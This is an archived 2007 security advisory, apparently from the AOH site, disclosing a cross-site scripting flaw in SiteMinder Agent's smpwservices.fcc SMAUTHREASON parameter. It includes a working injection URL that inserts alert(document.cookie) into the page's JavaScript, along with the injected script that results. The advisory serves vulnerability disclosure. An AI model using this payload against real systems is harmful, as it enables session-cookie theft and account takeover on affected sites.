AOH :: HP Unsorted S :: TB13318.HTM

SiteMinder Agent: Cross Site Scripting



SiteMinder Agent: Cross Site Scripting
SiteMinder Agent: Cross Site Scripting



# Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] 


# Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 

In this way we can inject the alert() code without brackets in the
function resetCredFields().


-------------------------------
function resetCredFields()
{

    if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 0 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 4 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 5 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 28 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 30 )
    {
        document.PWChange.PASSWORD.value = '';
    }
    else if (1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 1 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 18 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 20 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 22 || 1)
    {
    alert(document.cookie);
    }
}

function drop(){

if( 0 == 31 || 1)
    {
    alert(document.cookie);
    }
}
function drop(){

if( 0 == 34)
    {
        document.PWChange.NEWPASSWORD.value = '';
        document.PWChange.CONFIRMATION.value = '';
    }
}
...

-------------------------------


Regards,
Giuseppe Gottardi (aka oveRet)

---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: overet@securitydate.it 
Web: http://overet.securitydate.it 

Wednesday November 07, 2007.

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.